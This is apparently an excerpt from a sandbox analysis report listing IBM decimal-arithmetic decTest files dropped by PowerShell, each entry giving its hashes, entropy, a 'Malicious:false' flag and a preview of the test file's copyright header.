                                                                                                                                                                                                                      SHA-512:CA918DDB404875932EBF9C125238C1ABDECD31F98CAC80645E2D01D01D3D5F45FCBC6069D7E40E1A6ABFCDF4A1171A9A1A025DE1E29A82E9D503B00A079D1620
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddAbs.decTest -- decDouble absolute value, heeding sNaN --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):78095
                                                                                                                                                                                                                      Entropy (8bit):4.450816558091484
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:RC+KkNEG3yjdhiLYYSbnIE5UtzMN426VjA486fJlSJ7iTn6qO:E+KkNAjdhet44zm4U
                                                                                                                                                                                                                      MD5:A6BD65CA60FA500B439662E86D0BD148
                                                                                                                                                                                                                      SHA1:10461B14E78F4D12B7F5C82478595E0B9F0292D1
                                                                                                                                                                                                                      SHA-256:CBE2FB6DF9A317CE17C2765B2265AF94FC55C9E4D266169ADAF756473008B6E4
                                                                                                                                                                                                                      SHA-512:000962B770077D4D768FB1C4061D1FFFD24BF6312D5324E96782EE67297ED23F336AE776544461870CB821AC1D9DE4A22A27B5D53103C73BCB530EAC15766EDC
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddAdd.decTest -- decDouble addition --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):18619
                                                                                                                                                                                                                      Entropy (8bit):4.1354102089497164
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:tkoQ5KW1clkkMPVbpHF7hvFL8DQG3hlXbgSV:oKW1cykkL8f3hlXME
                                                                                                                                                                                                                      MD5:041B738165E3A1242E7D9E51245C95F3
                                                                                                                                                                                                                      SHA1:683CFD85059D6917310EEF3F3DF4A29C69B939AD
                                                                                                                                                                                                                      SHA-256:46598FB15155DFEF47686B54DDD4FC61DB04EA2490528684175E9D3435AB12FE
                                                                                                                                                                                                                      SHA-512:260E984890E2AB08AA5167FDFCA2BD808AA635234376402D5DB8479EC04F3B9831603D9C89D8A950A663F9CDD0537AB4B15D5289C42E0DE0438658A7F9847A7E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddAnd.decTest -- digitwise logical AND for decDoubles --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):54457
                                                                                                                                                                                                                      Entropy (8bit):4.830246234884271
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:Ek7PtRPV8vQnOKb8nFm0WFBKdG+730JefURoHw72BPTZcIjTeFat5sEmbtzXZuWE:31v/IDv3fURuw72BPT25DuDn
                                                                                                                                                                                                                      MD5:61CF698C5BF33DF717BF98F30A7A6B8F
                                                                                                                                                                                                                      SHA1:FC060CB78BB026BD0E7B0C76E903F9AC760D51E1
                                                                                                                                                                                                                      SHA-256:9366EBEB202C8C224B5B785FC5D7E09D4C40B877F9D27F195A894CAAD57F383F
                                                                                                                                                                                                                      SHA-512:B558BB8448BEB3AB411487F9357CEC8EC2300CF09F53541CF521036019A58C9C6E6C66B491B64F7F3B22E1C5B5ED6C87FBAE14350A475C9434639180DC0E4D0B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddBase.decTest -- base decDouble <--> string conversions --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):18908
                                                                                                                                                                                                                      Entropy (8bit):4.463172851788363
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:hko+10+CC4HMZiRh9Jo2gqSnMlKsHyFDXxRBFSUAZm6HScF9RyVhv74xhc:x9nkKE
                                                                                                                                                                                                                      MD5:189F8EC9AB3A42EC3825B62892F0E067
                                                                                                                                                                                                                      SHA1:BD4C3AFE67FC128387CBAB8DD733C1CBE5FE5070
                                                                                                                                                                                                                      SHA-256:A19D87ACB8957D4E18D2ECAAD4A70D0908528A046850712B7D2193F947928484
                                                                                                                                                                                                                      SHA-512:F7801FF66A1D1358D8A6D3C8924FCBBA21DA96A48FE1212A295DD58CCC889118EA7F41F0FDD39F2F507B05A0C6E132719DF6B0F9542CF06C3B28D02DAE39057D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddCanonical.decTest -- test decDouble canonical results --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3907
                                                                                                                                                                                                                      Entropy (8bit):3.943083082615738
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:LAFH/AQqBKGiQwedyvBgHC0ysYcbvys6lzrrWxs17:LAFoBkGiQHdaKYyKfp
                                                                                                                                                                                                                      MD5:CD1EBD705DDAB474F306A90BB5B85F33
                                                                                                                                                                                                                      SHA1:D7AA4560CDB69A19E0AE34A3C849048618F338BD
                                                                                                                                                                                                                      SHA-256:95FAE33B33F1E9A4EB8610540F4184502C51360C296F28BD97553BF1DC44C5BB
                                                                                                                                                                                                                      SHA-512:5D70680C6BF4DE7A61D0EC0FABB733E42DE34186A659D636074729DC9E225BD127E7C57CA3D3A568CC5E81E5BBD1322A503E24D8FE27A141D5F97D074AA7B865
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddClass.decTest -- decDouble Class operations --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):30282
                                                                                                                                                                                                                      Entropy (8bit):4.316874423961164
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:GkoVsNBd08MUaSoFZw1KPRl9JfjSt96aeWFdDJ0q72XP0TrHEWRFNdvW3j60pU/0:osNBd087ewr0OXdvWz60p7
                                                                                                                                                                                                                      MD5:7B8719A6C8AC1756F56AC079231BAF62
                                                                                                                                                                                                                      SHA1:46F778BC784C58D74C400412A21D691603F68CDC
                                                                                                                                                                                                                      SHA-256:24D0C49D5E92D40D72BA8A721284E4A383A486A48ED3F3B772FB8EF578EDEF1F
                                                                                                                                                                                                                      SHA-512:A2758E0AAC20929428499299E0791F665BA45B4FD852FD392EEF1636C9EFA891831C7074EDEF5BAA9C18DCA5E59B451C6B05677E863A206B1AB740EBE7AC3224
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddCompare.decTest -- decDouble comparison that allows quiet NaNs --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):28408
                                                                                                                                                                                                                      Entropy (8bit):4.501408256327645
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:WEURnhv6hcRjBsooYf05n+uvJv9sD62UdYHpa93zZTxAJuM3Qu68SNEFCIjsOagm:wOOm
                                                                                                                                                                                                                      MD5:0D8733C7C1E81250790592ABA11440C9
                                                                                                                                                                                                                      SHA1:4D76552B72B95F686C55BB9C7B7A9EDA89B298BF
                                                                                                                                                                                                                      SHA-256:0AE9573FFDA2EA4DA86C02E1C11B3F8CD6F577E8F4F1CEC54D5A04625CD7A457
                                                                                                                                                                                                                      SHA-512:10FBA2980630993CED6F81E7B8F57CC543C20BE02ED513A1D05385B79F58E429D74BF4BDC0333BA55E51A5E42E4BE4CAD1F00C69657A8D1AC7FC8F1C03C51BEE
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddCompareSig.decTest -- decDouble comparison; all NaNs signal --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):30638
                                                                                                                                                                                                                      Entropy (8bit):4.372424137739806
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:DkoVO1oVzZSTRiDQbpb4xGWiHO4xmrqFk1IUO9Zq6fIqclGf:bWrR9ZXxFjpZ9fIqcQf
                                                                                                                                                                                                                      MD5:E04A3DC6905D4ABA48530BF8274702AD
                                                                                                                                                                                                                      SHA1:1B33281F9C1688E3AA89F2B9D012F2887F229488
                                                                                                                                                                                                                      SHA-256:DDB9C219A0B46C0B5D41B5CD5F8BC664B33D9824773C955D3CCDBA066BD4E630
                                                                                                                                                                                                                      SHA-512:DB696D55F8BD9B31FB53551A68C52B6CA10E21B476AF2602C2777EA2E4C9386AE2156D3CDFE3AA8C69E9739F318B1D43F9DE9E717E180461BEC573465A685D8E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddCompareTotal.decTest -- decDouble comparison using total ordering--..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):32418
                                                                                                                                                                                                                      Entropy (8bit):4.302173302730373
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:9dEo8BsjXylNzPABSTkFm3FtajQJG/8VDw6+enmW:iPABSTkFm3FtajQJG/8V5+enmW
                                                                                                                                                                                                                      MD5:87DFB55623A848126BC6003CF5243E69
                                                                                                                                                                                                                      SHA1:545A061653F6EBB0E6B27931990DE4D5DAF01B1A
                                                                                                                                                                                                                      SHA-256:ABE3488E156E7A860F84F79E78D0B09F6D5627BA469304DE3C5042D0C3E878EC
                                                                                                                                                                                                                      SHA-512:CB806B45C8DEAD639BE0D061C398635574651AD2BC7C7BF078163ADC2F5787C3646C57061D24504AA21B41FCF0CD34DC27B5EE8FCB8D5029E2AEEE62F6B6E9DE
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddCompareTotalMag.decTest -- decDouble comparison; abs. total order--..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3621
                                                                                                                                                                                                                      Entropy (8bit):4.4138847956441465
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:LcoBkGiQHdag/CjT9PaIiFFZFFmFFGFFeRJB:bkoHQlaIiFFZFFmFFGFFed
                                                                                                                                                                                                                      MD5:BCB62BDCCD1F8C06CB44120300BE8AFB
                                                                                                                                                                                                                      SHA1:C1AE8BFEB76ACAEB29F7872CA5E4C5F5E25C1B27
                                                                                                                                                                                                                      SHA-256:87A88512CF122E3E4A88E0D3EF779D0F3B7BE91DC8408A02BA63472AA58F7FDA
                                                                                                                                                                                                                      SHA-512:8CD53443554E43E331CD9BD54A79533B6D98E0FCF9569C15E887301F470C97B86BB4F036ED5DB405A707797D51DB5D3D5636544AD511F46D508FA1A650956ECB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddCopy.decTest -- quiet decDouble copy --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3729
                                                                                                                                                                                                                      Entropy (8bit):4.484534395239739
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:LloBkGiQHda4ios52+i81bFoFFZFFkFF9FFCzlx:wko/ios8B81bFoFFZFFkFF9FF8x
                                                                                                                                                                                                                      MD5:978E3DF28199781625995D6D3907819E
                                                                                                                                                                                                                      SHA1:4C1F26A2AC416D36F46CE9EA814030A4998BDF86
                                                                                                                                                                                                                      SHA-256:54E58D114D57F056BF90CB4BC9B54DB2D7104248AABD317954C668077D165736
                                                                                                                                                                                                                      SHA-512:781437829472AA6A8D4C2D31FA0566C5D8047BBA555740EAB62202E2AA4B3A3C78BE8D78AEEDACD824ED1D766CB69A674728FBDD3B882D200EB4461253AB431D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddCopyAbs.decTest -- quiet decDouble copy and set sign to zero --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3882
                                                                                                                                                                                                                      Entropy (8bit):4.493028879176931
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:LnoBkGiQHdaxCGNWjPXNqxFFyFFJFF9FFf2:ukoiCr9qxFFyFFJFF9FFe
                                                                                                                                                                                                                      MD5:2C2B65B1F3149D58D4F59EEA6DDD8A5D
                                                                                                                                                                                                                      SHA1:5A065F9B1C42A69845EAFD141A883CD93FB21CB4
                                                                                                                                                                                                                      SHA-256:4FC915133757CD5C2AD758DD1DEB574ED7F95C37C1B0A5AB099687F1439A3EC8
                                                                                                                                                                                                                      SHA-512:C9DD7DF5183C1C4D6DD14588A983C8615B35C6AFF4873CA91EE3983E8C073B2823669BBC147F4C9DB36B7048A4319FB90C55E9381C8D59D460D186C4FA4F97E5
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddCopyNegate.decTest -- quiet decDouble copy and negate --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):7632
                                                                                                                                                                                                                      Entropy (8bit):4.349902769492432
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:SkodewTFFzFFpFFnFFVFzEVzFFiFFbFFOFFND:pwTFFzFFpFFnFFIVzFFiFFbFFOFFND
                                                                                                                                                                                                                      MD5:E9D70CC5A82FC914952DD55B3CD98E2D
                                                                                                                                                                                                                      SHA1:D6D34CCF1ADA50F2701C27EDAB1A1C79AA461FD2
                                                                                                                                                                                                                      SHA-256:F3443420E464473D2271A09CB22864525ED92E4EAF1CA972A865A7B3BDFABB92
                                                                                                                                                                                                                      SHA-512:B2A12FD37989E49D939E8A50D874EF47BC27D0D5E07C8A98132C1EFCA4C73FBCBA6A92BCDC5B620B63790F34A156F52CF9FAABAC5CFE39A7FF617C527ECA79CA
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddCopySign.decTest -- quiet decDouble copy with sign from rhs --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):48137
                                                                                                                                                                                                                      Entropy (8bit):4.582309165739588
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:whQbkbNcTpEcEx5ApIKptPEKLtgxGxnvEpRB:w5ag5AnptEKZgxGxvEpRB
                                                                                                                                                                                                                      MD5:42E07DBDD5695409FB0D4440659FC4A0
                                                                                                                                                                                                                      SHA1:003630CB8B1B9229A25F4F008108EB4604EC9C77
                                                                                                                                                                                                                      SHA-256:3FDCFBA2D740FBDE069695B979C5EA874FE44B2C1798942DEB2E91C24A4E75D6
                                                                                                                                                                                                                      SHA-512:91434D301B9BC936F554B29FE13975106DAFE8008466E04AA0ED96E36DF5A04CE8D38B3FE60B33684331A71D9E5747475769B2E3A95EADB68424FCFF1CD3AAA2
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddDivide.decTest -- decDouble division --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):19584
                                                                                                                                                                                                                      Entropy (8bit):4.309063945784695
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:ckoQM0TaHmXwz9z6/uN+1qhAaVrUsOJOiRPashcwPPVYthGmippz0/j0+GVhljOw:1TANZgg5kuk
                                                                                                                                                                                                                      MD5:A3928C7E27C2071AC55AB2BCA94A193B
                                                                                                                                                                                                                      SHA1:EB0C545A90CF9B1133D38FB602354AF3A89D0FA0
                                                                                                                                                                                                                      SHA-256:FBB7E76DF1B65BEFBE724A6B33274E2C0128E4772D0215A36A2F589AC9B45F13
                                                                                                                                                                                                                      SHA-512:6098CC9D476D94F49813538175299224A912CF7F4DA289DF66020DFAF25332292F294026267BBC87AEEE00A3ADB9DB761F079B7C372C123FD42B72F419C89A88
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddDivideInt.decTest -- decDouble integer division --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):24688
                                                                                                                                                                                                                      Entropy (8bit):4.270582003149716
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:IkoQ2EOWpgEJCj/WWBjQaKEgvWOCuHKPYrj6Lle0Ex/AB0zV8zvFMj3Dr/nB8qfa:RCj/tJQaLQnseyBg+FeB8qfJxu7
                                                                                                                                                                                                                      MD5:D9154EC478A4AE4107F63EDF3376A33B
                                                                                                                                                                                                                      SHA1:12C9B71660D795D59F7999368F9C60AF5546EA52
                                                                                                                                                                                                                      SHA-256:D3C3E0A8A3360C02C07A0FBFB6C1CD0613FF0782018900FF2000B805C68D2FF6
                                                                                                                                                                                                                      SHA-512:F9746C380492C6694D61A3F9F3F05A0AB520E7295FC10267F1569E1F1F1F6FF6D54C322AA3927BFFC8EBBD0D493C8F9E7435C71B32A3B4D58E213B4D529B5678
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddEncode.decTest -- decimal eight-byte format testcases --..-- Copyright (c) IBM Corporation, 2000, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):102180
                                                                                                                                                                                                                      Entropy (8bit):4.499589122426996
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:+BIFvZuR/aIp6bE+fqliqqO1QqoWYdU9XNa:OiH8oWYd6E
                                                                                                                                                                                                                      MD5:D08386B6AEE2BDC64D6B13590F6CFF35
                                                                                                                                                                                                                      SHA1:59D6A64AE5E83300D6920FFBAA00B4603DD73DFD
                                                                                                                                                                                                                      SHA-256:9A3D09EF879B5435CF0B6E910DE4AB94827FF7D618087C9A62CCC91473D08C4B
                                                                                                                                                                                                                      SHA-512:95A239BFE559E7A326E135831E64B07AC2803D3E7C61CFFAF527D6E90130A5D7D026165887F415077F55FFFD6BA134911E0E8B37F6D49A98B2A601FE23E3A48B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddFMA.decTest -- decDouble Fused Multiply Add --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):10361
                                                                                                                                                                                                                      Entropy (8bit):4.350685133772896
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:LPEoBkGiQHdaVnX9IsSydHE/3HpQGEsiKiy3dUmUAn21:7PkoQuDniyNUmg1
                                                                                                                                                                                                                      MD5:B7C53818AA081DDCE9FB00EA689373C4
                                                                                                                                                                                                                      SHA1:480925768447AFB483915BE04DAEB6E9D2BE3F1B
                                                                                                                                                                                                                      SHA-256:5DB02BADBE1F2C9E1A07EB44947B81CF20E01DB6E79F116C0284F59F4F0ECB5F
